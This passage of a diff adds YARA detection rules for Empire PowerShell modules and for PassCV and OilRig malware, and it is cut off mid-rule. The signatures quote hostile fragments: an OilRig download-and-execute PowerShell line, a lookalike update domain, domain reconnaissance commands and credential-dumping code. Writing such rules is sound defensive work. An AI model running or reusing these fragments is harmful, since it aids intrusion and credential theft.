+      hash1 = "a8c1b108a67e7fc09f81bd160c3bafb526caf3dbbaf008efb9a96f4151756ff2"
+      tags = "DEMO, EXE, FILE, HKTL, SCRIPT, T1064"
+      minimum_yara = "1.7"
+      
+   strings:
+      $a1 = "\\PowerShellRunner.pdb" ascii
+      $a2 = "PowerShellRunner.dll" fullword wide
+      $s1 = "ReflectivePick" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 400KB and 1 of ( $a* ) and $s1
+}
+
+rule Empire_Out_Minidump_RID2EAC : DEMO HKTL SCRIPT T1003_001 T1059_001 T1064 T1086 {
+   meta:
+      description = "Detects Empire component - file Out-Minidump.ps1"
+      author = "Florian Roth"
+      reference = "https://github.com/adaptivethreat/Empire"
+      date = "2016-11-05 11:24:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "7803ae7ba5d4e7d38e73745b3f321c2ca714f3141699d984322fa92e0ff037a1"
+      tags = "DEMO, HKTL, SCRIPT, T1003_001, T1059_001, T1064, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "$Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle," fullword ascii
+      $s2 = "$ProcessFileName = \"$($ProcessName)_$($ProcessId).dmp\"" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x7566 and filesize < 10KB and 1 of them ) or all of them
+}
+
+rule Empire_Invoke_PsExec_RID2EE5 : DEMO HKTL SCRIPT T1035 T1059_001 T1064 T1086 {
+   meta:
+      description = "Detects Empire component - file Invoke-PsExec.ps1"
+      author = "Florian Roth"
+      reference = "https://github.com/adaptivethreat/Empire"
+      date = "2016-11-05 11:34:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "0218be4323959fc6379489a6a5e030bb9f1de672326e5e5b8844ab5cedfdcf88"
+      tags = "DEMO, HKTL, SCRIPT, T1035, T1059_001, T1064, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Invoke-PsExecCmd" fullword ascii
+      $s2 = "\"[*] Executing service .EXE" fullword ascii
+      $s3 = "$cmd = \"%COMSPEC% /C echo $Command ^> %systemroot%\\Temp\\" ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x7566 and filesize < 50KB and 1 of them ) or all of them
+}
+
+rule Empire_Invoke_PostExfil_RID303B : DEMO HKTL SCRIPT T1059_001 T1064 T1086 {
+   meta:
+      description = "Detects Empire component - file Invoke-PostExfil.ps1"
+      author = "Florian Roth"
+      reference = "https://github.com/adaptivethreat/Empire"
+      date = "2016-11-05 12:31:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "00c0479f83c3dbbeff42f4ab9b71ca5fe8cd5061cb37b7b6861c73c54fd96d3e"
+      tags = "DEMO, HKTL, SCRIPT, T1059_001, T1064, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "# upload to a specified exfil URI" fullword ascii
+      $s2 = "Server path to exfil to." fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x490a and filesize < 2KB and 1 of them ) or all of them
+}
+
+rule Empire_Invoke_SMBAutoBrute_RID311A : DEMO HKTL SCRIPT T1059_001 T1064 T1086 {
+   meta:
+      description = "Detects Empire component - file Invoke-SMBAutoBrute.ps1"
+      author = "Florian Roth"
+      reference = "https://github.com/adaptivethreat/Empire"
+      date = "2016-11-05 13:08:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "7950f8abdd8ee09ed168137ef5380047d9d767a7172316070acc33b662f812b2"
+      tags = "DEMO, HKTL, SCRIPT, T1059_001, T1064, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "[*] PDC: LAB-2008-DC1.lab.com" fullword ascii
+      $s2 = "$attempts = Get-UserBadPwdCount $userid $dcs" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x7566 and filesize < 30KB and 1 of them ) or all of them
+}
+
+rule Empire_Get_Keystrokes_RID2F85 : DEMO HKTL SCRIPT T1059_001 T1064 T1086 {
+   meta:
+      description = "Detects Empire component - file Get-Keystrokes.ps1"
+      author = "Florian Roth"
+      reference = "https://github.com/adaptivethreat/Empire"
+      date = "2016-11-05 12:00:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "c36e71db39f6852f78df1fa3f67e8c8a188bf951e96500911e9907ee895bf8ad"
+      tags = "DEMO, HKTL, SCRIPT, T1059_001, T1064, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "$RightMouse   = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RButton) -band 0x8000) -eq 0x8000" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x7566 and filesize < 30KB and 1 of them ) or all of them
+}
+
+rule Empire_Invoke_DllInjection_RID315C : DEMO HKTL SCRIPT T1055 T1059_001 T1064 T1086 {
+   meta:
+      description = "Detects Empire component - file Invoke-DllInjection.ps1"
+      author = "Florian Roth"
+      reference = "https://github.com/adaptivethreat/Empire"
+      date = "2016-11-05 13:19:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "304031aa9eca5a83bdf1f654285d86df79cb3bba4aa8fe1eb680bd5b2878ebf0"
+      tags = "DEMO, HKTL, SCRIPT, T1055, T1059_001, T1064, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "-Dll evil.dll" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x7566 and filesize < 40KB and 1 of them ) or all of them
+}
+
+rule Empire_KeePassConfig_RID2ED4 : DEMO HKTL SCRIPT T1059_001 T1064 T1086 {
+   meta:
+      description = "Detects Empire component - file KeePassConfig.ps1"
+      author = "Florian Roth"
+      reference = "https://github.com/adaptivethreat/Empire"
+      date = "2016-11-05 11:31:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "5a76e642357792bb4270114d7cd76ce45ba24b0d741f5c6b916aeebd45cff2b3"
+      tags = "DEMO, HKTL, SCRIPT, T1059_001, T1064, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "$UserMasterKeyFiles = @(, $(Get-ChildItem -Path $UserMasterKeyFolder -Force | Select-Object -ExpandProperty FullName) )" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x7223 and filesize < 80KB and 1 of them ) or all of them
+}
+
+rule Empire_Invoke_SSHCommand_RID304A : DEMO HKTL SCRIPT T1059_001 T1064 T1086 {
+   meta:
+      description = "Detects Empire component - file Invoke-SSHCommand.ps1"
+      author = "Florian Roth"
+      reference = "https://github.com/adaptivethreat/Empire"
+      date = "2016-11-05 12:33:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "cbaf086b14d5bb6a756cbda42943d4d7ef97f8277164ce1f7dd0a1843e9aa242"
+      tags = "DEMO, HKTL, SCRIPT, T1059_001, T1064, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "$Base64 = 'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAA" ascii
+      $s2 = "Invoke-SSHCommand -ip 192.168.1.100 -Username root -Password test -Command \"id\"" fullword ascii
+      $s3 = "Write-Verbose \"[*] Error loading dll\"" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x660a and filesize < 2000KB and 1 of them ) or all of them
+}
+
+rule Empire_PowerUp_Gen_RID2E1D : DEMO GEN HKTL SCRIPT T1059_001 T1064 T1086 {
+   meta:
+      description = "Detects Empire component - from files PowerUp.ps1, PowerUp.ps1"
+      author = "Florian Roth"
+      reference = "https://github.com/adaptivethreat/Empire"
+      date = "2016-11-05 11:00:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "ad9a5dff257828ba5f15331d59dd4def3989537b3b6375495d0c08394460268c"
+      tags = "DEMO, GEN, HKTL, SCRIPT, T1059_001, T1064, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "$Result = sc.exe config $($TargetService.Name) binPath= $OriginalPath" fullword ascii
+      $s2 = "$Result = sc.exe pause $($TargetService.Name)" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x233c and filesize < 2000KB and 1 of them ) or all of them
+}
+
+rule Empire_Agent_Gen_RID2D3A : DEMO GEN HKTL SCRIPT T1059_001 T1064 T1086 {
+   meta:
+      description = "Detects Empire component - from files agent.ps1, agent.ps1"
+      author = "Florian Roth"
+      reference = "https://github.com/adaptivethreat/Empire"
+      date = "2016-11-05 10:22:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "380fd09bfbe47d5c8c870c1c97ff6f44982b699b55b61e7c803d3423eb4768db"
+      hash2 = "380fd09bfbe47d5c8c870c1c97ff6f44982b699b55b61e7c803d3423eb4768db"
+      tags = "DEMO, GEN, HKTL, SCRIPT, T1059_001, T1064, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "$wc.Headers.Add(\"User-Agent\",$script:UserAgent)" fullword ascii
+      $s2 = "$min = [int]((1-$script:AgentJitter)*$script:AgentDelay)" fullword ascii
+      $s3 = "if ($script:AgentDelay -ne 0){" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x660a and filesize < 100KB and 1 of them ) or all of them
+}
+
+rule Empire_Invoke_InveighRelay_Gen_RID32DD : DEMO GEN HKTL SCRIPT T1059_001 T1064 T1086 {
+   meta:
+      description = "Detects Empire component - from files Invoke-InveighRelay.ps1, Invoke-InveighRelay.ps1"
+      author = "Florian Roth"
+      reference = "https://github.com/adaptivethreat/Empire"
+      date = "2016-11-05 14:23:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash2 = "21b90762150f804485219ad36fa509aeda210d46453307a9761c816040312f41"
+      tags = "DEMO, GEN, HKTL, SCRIPT, T1059_001, T1064, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "$inveigh.SMBRelay_failed_list.Add(\"$HTTP_NTLM_domain_string\\$HTTP_NTLM_user_string $SMBRelayTarget\")" fullword ascii
+      $s2 = "$NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes)" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x7566 and filesize < 200KB and 1 of them ) or all of them
+}
+
+rule Empire_KeePassConfig_Gen_RID304D : DEMO GEN HKTL SCRIPT T1059_001 T1064 T1086 {
+   meta:
+      description = "Detects Empire component - from files KeePassConfig.ps1, KeePassConfig.ps1"
+      author = "Florian Roth"
+      reference = "https://github.com/adaptivethreat/Empire"
+      date = "2016-11-05 12:34:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash2 = "5a76e642357792bb4270114d7cd76ce45ba24b0d741f5c6b916aeebd45cff2b3"
+      tags = "DEMO, GEN, HKTL, SCRIPT, T1059_001, T1064, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "$KeePassXML = [xml](Get-Content -Path $KeePassXMLPath)" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x7223 and filesize < 80KB and 1 of them ) or all of them
+}
+
+rule Empire_Invoke_Portscan_Gen_RID3160 : DEMO GEN HKTL SCRIPT T1059_001 T1064 T1086 {
+   meta:
+      description = "Detects Empire component - from files Invoke-Portscan.ps1, Invoke-Portscan.ps1"
+      author = "Florian Roth"
+      reference = "https://github.com/adaptivethreat/Empire"
+      date = "2016-11-05 13:19:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash2 = "cf7030be01fab47e79e4afc9e0d4857479b06a5f68654717f3bc1bc67a0f38d3"
+      tags = "DEMO, GEN, HKTL, SCRIPT, T1059_001, T1064, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Test-Port -h $h -p $Port -timeout $Timeout" fullword ascii
+      $s2 = "1 {$nHosts=10;  $Threads = 32;   $Timeout = 5000 }" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x7566 and filesize < 100KB and 1 of them ) or all of them
+}
+
+rule Empire_Invoke_Gen_RID2DB7 : DEMO GEN HKTL SCRIPT T1059_001 T1064 T1086 {
+   meta:
+      description = "Detects Empire component - from files Invoke-DCSync.ps1, Invoke-PSInject.ps1, Invoke-ReflectivePEInjection.ps1"
+      author = "Florian Roth"
+      reference = "https://github.com/adaptivethreat/Empire"
+      date = "2016-11-05 10:43:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "a3428a7d4f9e677623fadff61b2a37d93461123535755ab0f296aa3b0396eb28"
+      hash2 = "61e5ca9c1e8759a78e2c2764169b425b673b500facaca43a26c69ff7e09f62c4"
+      hash3 = "eaff29dd0da4ac258d85ecf8b042d73edb01b4db48c68bded2a8b8418dc688b5"
+      tags = "DEMO, GEN, HKTL, SCRIPT, T1059_001, T1064, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "$Shellcode1 += 0x48" fullword ascii
+      $s2 = "$PEHandle = [IntPtr]::Zero" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x7566 and filesize < 3000KB and 1 of them ) or all of them
+}
+
+rule Empire_PowerShell_Framework_Gen5_RID3392 : DEMO HKTL SCRIPT T1059_001 T1064 T1086 {
+   meta:
+      description = "Detects Empire component - from files Invoke-CredentialInjection.ps1, Invoke-PSInject.ps1, Invoke-ReflectivePEInjection.ps1"
+      author = "Florian Roth"
+      reference = "https://github.com/adaptivethreat/Empire"
+      date = "2016-11-05 14:53:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8"
+      hash2 = "61e5ca9c1e8759a78e2c2764169b425b673b500facaca43a26c69ff7e09f62c4"
+      hash3 = "eaff29dd0da4ac258d85ecf8b042d73edb01b4db48c68bded2a8b8418dc688b5"
+      tags = "DEMO, HKTL, SCRIPT, T1059_001, T1064, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "if ($ExeArgs -ne $null -and $ExeArgs -ne '')" fullword ascii
+      $s2 = "$ExeArgs = \"ReflectiveExe $ExeArgs\"" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x7566 and filesize < 1000KB and 1 of them ) or all of them
+}
+
+rule PassCV_Sabre_Malware_1_RID2F45 : APT DEMO EXE FILE MAL {
+   meta:
+      description = "PassCV Malware mentioned in Cylance Report"
+      author = "Florian Roth"
+      reference = "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies"
+      date = "2016-10-20 11:50:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "24a9bfbff81615a42e42755711c8d04f359f3bf815fb338022edca860ff1908a"
+      hash2 = "e61e56b8f2666b9e605127b4fcc7dc23871c1ae25aa0a4ea23b48c9de35d5f55"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "F:\\Excalibur\\Excalibur\\Excalibur\\" ascii
+      $x2 = "bin\\oSaberSvc.pdb" ascii
+      $s1 = "cmd.exe /c MD " fullword ascii
+      $s2 = "https://www.baidu.com/s?ie=utf-8&f=8&rsv_bp=0&rsv_idx=1&tn=baidu&wd=ip138" fullword wide
+      $s3 = "CloudRun.exe" fullword wide
+      $s4 = "SaberSvcB.exe" fullword wide
+      $s5 = "SaberSvc.exe" fullword wide
+      $s6 = "SaberSvcW.exe" fullword wide
+      $s7 = "tianshiyed@iaomaomark1#23mark123tokenmarkqwebjiuga664115" fullword wide
+      $s8 = "Internet Connect Failed!" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and ( 1 of ( $x* ) and 5 of ( $s* ) ) ) or ( all of them )
+}
+
+rule PassCV_Sabre_Malware_Signing_Cert_RID33D0 : APT DEMO EXE FILE MAL {
+   meta:
+      description = "PassCV Malware mentioned in Cylance Report"
+      author = "Florian Roth"
+      reference = "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies"
+      date = "2016-10-20 15:03:51"
+      score = 50
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "7c32885c258a6d5be37ebe83643f00165da3ebf963471503909781540204752e"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "WOODTALE TECHNOLOGY INC" ascii
+      $s2 = "Flyingbird Technology Limited" ascii
+      $s3 = "Neoact Co., Ltd." ascii
+      $s4 = "AmazGame Age Internet Technology Co., Ltd" ascii
+      $s5 = "EMG Technology Limited" ascii
+      $s6 = "Zemi Interactive Co., Ltd" ascii
+      $s7 = "337 Technology Limited" ascii
+      $s8 = "Runewaker Entertainment0" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 3000KB and 1 of them )
+}
+
+rule PassCV_Sabre_Malware_2_RID2F46 : APT DEMO EXE FILE MAL {
+   meta:
+      description = "PassCV Malware mentioned in Cylance Report"
+      author = "Florian Roth"
+      reference = "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies"
+      date = "2016-10-20 11:50:11"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "475d1c2d36b2cf28b28b202ada78168e7482a98b42ff980bbb2f65c6483db5b4"
+      hash2 = "009645c628e719fad2e280ef60bbd8e49bf057196ac09b3f70065f1ad2df9b78"
+      hash3 = "92479c7503393fc4b8dd7c5cd1d3479a182abca3cda21943279c68a8eef9c64b"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "ncProxyXll" fullword ascii
+      $s1 = "Uniscribe.dll" fullword ascii
+      $s2 = "WS2_32.dll" ascii
+      $s3 = "ProxyDll" fullword ascii
+      $s4 = "JDNSAPI.dll" fullword ascii
+      $s5 = "x64.dat" fullword ascii
+      $s6 = "LSpyb2" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 4000KB and $x1 ) or ( all of them )
+}
+
+rule PassCV_Sabre_Malware_Excalibur_1_RID3343 : APT DEMO EXE MAL {
+   meta:
+      description = "PassCV Malware mentioned in Cylance Report"
+      author = "Florian Roth"
+      reference = "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies"
+      date = "2016-10-20 14:40:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "21566f5ff7d46cc9256dae8bc7e4c57f2b9261f95f6ad2ac921558582ea50dfb"
+      hash2 = "02922c5d994e81629d650be2a00507ec5ca221a501fe3827b5ed03b4d9f4fb70"
+      tags = "APT, DEMO, EXE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "F:\\Excalibur\\Excalibur\\" ascii
+      $x2 = "Excalibur\\bin\\Shell.pdb" ascii
+      $x3 = "SaberSvc.exe" wide
+      $s1 = "BBB.exe" fullword wide
+      $s2 = "AAA.exe" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 2000KB and 1 of ( $x* ) or all of ( $s* ) ) or 3 of them
+}
+
+rule PassCV_Sabre_Malware_3_RID2F47 : APT DEMO EXE FILE MAL {
+   meta:
+      description = "PassCV Malware mentioned in Cylance Report"
+      author = "Florian Roth"
+      reference = "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies"
+      date = "2016-10-20 11:50:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "28c7575b2368a9b58d0d1bf22257c4811bd3c212bd606afc7e65904041c29ce1"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "NXKILL" fullword wide
+      $s1 = "2OLE32.DLL" fullword ascii
+      $s2 = "localspn.dll" fullword wide
+      $s3 = "!This is a Win32 program." fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 8000KB and $x1 and 2 of ( $s* ) )
+}
+
+rule PassCV_Sabre_Malware_4_RID2F48 : APT DEMO EXE FILE MAL {
+   meta:
+      description = "PassCV Malware mentioned in Cylance Report"
+      author = "Florian Roth"
+      reference = "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies"
+      date = "2016-10-20 11:50:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "27463bcb4301f0fdd95bc10bf67f9049e161a4e51425dac87949387c54c9167f"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "QWNjZXB0On" fullword ascii
+      $s2 = "VXNlci1BZ2VudDogT" fullword ascii
+      $s3 = "dGFzay5kbnME3luLmN" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 200KB and 2 of them )
+}
+
+rule PassCV_Sabre_Tool_NTScan_RID3010 : APT DEMO EXE FILE MAL T1077 {
+   meta:
+      description = "PassCV Malware mentioned in Cylance Report"
+      author = "Florian Roth"
+      reference = "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies"
+      date = "2016-10-20 12:23:51"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "0f290612b26349a551a148304a0bd3b0d0651e9563425d7c362f30bd492d8665"
+      tags = "APT, DEMO, EXE, FILE, MAL, T1077"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "NTscan.EXE" fullword wide
+      $x2 = "NTscan Microsoft " fullword wide
+      $s1 = "admin$" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 300KB and 2 of them )
+}
+
+rule PassCV_Sabre_Malware_5_RID2F49 : APT DEMO EXE FILE MAL {
+   meta:
+      description = "PassCV Malware mentioned in Cylance Report"
+      author = "Florian Roth"
+      reference = "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies"
+      date = "2016-10-20 11:50:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "03aafc5f468a84f7dd7d7d38f91ff17ef1ca044e5f5e8bbdfe589f5509b46ae5"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "ncircTMPg" fullword ascii
+      $x2 = "~SHELL#" fullword ascii
+      $x3 = "N.adobe.xm" fullword ascii
+      $s1 = "NEL32.DLL" fullword ascii
+      $s2 = "BitLocker.exe" fullword wide
+      $s3 = "|xtplhd" fullword ascii
+      $s4 = "SERVICECORE" fullword wide
+      $s5 = "SHARECONTROL" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 4000KB and 1 of ( $x* ) or all of ( $s* ) )
+}
+
+rule OilRig_Malware_Campaign_Gen1_RID31A8 : DEMO FILE G0049 MAL MIDDLE_EAST {
+   meta:
+      description = "Detects Oilrig malware samples"
+      author = "Florian Roth"
+      reference = "https://goo.gl/QMRZ8K"
+      date = "2016-10-12 13:31:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "d808f3109822c185f1d8e1bf7ef7781c219dc56f5906478651748f0ace489d34"
+      hash2 = "80161dad1603b9a7c4a92a07b5c8bce214cf7a3df897b561732f9df7920ecb3e"
+      hash3 = "662c53e69b66d62a4822e666031fd441bbdfa741e20d4511c6741ec3cb02475f"
+      tags = "DEMO, FILE, G0049, MAL, MIDDLE_EAST"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Get-Content $env:Public\\Libraries\\update.vbs) -replace" ascii
+      $x2 = "wss.Run \"powershell.exe \" & Chr(34) & \"& {waitfor haha /T 2}\" & Chr(34), 0" fullword ascii
+      $x3 = "Call Extract(UpdateVbs, wss.ExpandEnvironmentStrings(\"%PUBLIC%\") & \"\\Libraries\\update.vbs\")" fullword ascii
+      $s4 = "CreateObject(\"WScript.Shell\").Run cmd, 0o" fullword ascii
+      $b1 = "JGdsb2JhbDpteWhvc3QgP" ascii
+      $b2 = "SE9NRT0iJXB1YmxpYyVcTGlicmFyaWVzX" ascii
+      $b3 = "U2V0IHdzcyA9IENyZWF0ZU9iamVjdCgid1NjcmlwdC5TaGV" ascii
+      $b4 = "JHNjcmlwdGRpciA9IFNwbGl0LVBhdGggLVBhcmVudCAtUGF0aCA" ascii
+      $b5 = "DQpTZXQgd3NzID0gQ3JlYXRlT2JqZWN" ascii
+      $b6 = "d2hvYW1pICYgaG9zdG5hb" ascii
+   condition: 
+      ( uint16 ( 0 ) == 0xcfd0 and filesize < 700KB and 1 of them )
+}
+
+rule OilRig_Malware_Campaign_Mal1_RID31A8 : DEMO FILE G0049 MAL MIDDLE_EAST T1105 {
+   meta:
+      description = "Detects Oilrig malware samples"
+      author = "Florian Roth"
+      reference = "https://goo.gl/QMRZ8K"
+      date = "2016-10-12 13:31:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "e17e1978563dc10b73fd54e7727cbbe95cc0b170a4e7bd0ab223e059f6c25fcc"
+      tags = "DEMO, FILE, G0049, MAL, MIDDLE_EAST, T1105"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "DownloadExecute=\"powershell \"\"&{$r=Get-Random;$wc=(new-object System.Net.WebClient);$wc.DownloadFile(" ascii
+      $x2 = "-ExecutionPolicy Bypass -File \"&HOME&\"dns.ps1\"" fullword ascii
+      $x3 = "CreateObject(\"WScript.Shell\").Run Replace(DownloadExecute,\"-_\",\"bat\")" fullword ascii
+      $x4 = "CreateObject(\"WScript.Shell\").Run DnsCmd,0" fullword ascii
+      $s1 = "http://winodwsupdates.me" ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x4f48 and filesize < 4KB and 1 of them ) or ( 2 of them )
+}
+
+rule OilRig_Malware_Campaign_Mal2_RID31A9 : DEMO FILE G0049 MAL MIDDLE_EAST {
+   meta:
+      description = "Detects Oilrig malware samples"
+      author = "Florian Roth"
+      reference = "https://goo.gl/QMRZ8K"
+      date = "2016-10-12 13:32:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "65920eaea00764a245acb58a3565941477b78a7bcc9efaec5bf811573084b6cf"
+      tags = "DEMO, FILE, G0049, MAL, MIDDLE_EAST"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "wss.Run \"powershell.exe \" & Chr(34) & \"& {(Get-Content $env:Public\\Libraries\\update.vbs) -replace '__',(Get-Random) | Set-C" ascii
+      $x2 = "Call Extract(UpdateVbs, wss.ExpandEnvironmentStrings(\"%PUBLIC%\") & \"\\Libraries\\update.vbs\")" fullword ascii
+      $x3 = "mailto:Mohammed.sarah@gratner.com" fullword wide
+      $x4 = "mailto:Tarik.Imam@gartner.com" fullword wide
+      $x5 = "Call Extract(DnsPs1, wss.ExpandEnvironmentStrings(\"%PUBLIC%\") & \"\\Libraries\\dns.ps1\")" fullword ascii
+      $x6 = "2dy53My5vcmcvMjAw" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0xcfd0 and filesize < 200KB and 1 of them )
+}
+
+rule OilRig_Campaign_Reconnaissance_RID32E1 : DEMO G0049 MAL MIDDLE_EAST T1016 T1033 T1087 {
+   meta:
+      description = "Detects Oilrig malware samples"
+      author = "Florian Roth"
+      reference = "https://goo.gl/QMRZ8K"
+      date = "2016-10-12 14:24:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "5893eae26df8e15c1e0fa763bf88a1ae79484cdb488ba2fc382700ff2cfab80c"
+      tags = "DEMO, G0049, MAL, MIDDLE_EAST, T1016, T1033, T1087"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "whoami & hostname & ipconfig /all" ascii
+      $s2 = "net user /domain 2>&1 & net group /domain 2>&1" ascii
+      $s3 = "net group \"domain admins\" /domain 2>&1 & " ascii
+   condition: 
+      ( filesize < 1KB and 1 of them )
+}
+
+rule OilRig_Malware_Campaign_Mal3_RID31AA : DEMO G0049 MAL MIDDLE_EAST {
+   meta:
+      description = "Detects Oilrig malware samples"
+      author = "Florian Roth"
+      reference = "https://goo.gl/QMRZ8K"
+      date = "2016-10-12 13:32:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "02226181f27dbf59af5377e39cf583db15200100eea712fcb6f55c0a2245a378"
+      tags = "DEMO, G0049, MAL, MIDDLE_EAST"
+      minimum_yara = "1.7"
+      
+   strings:
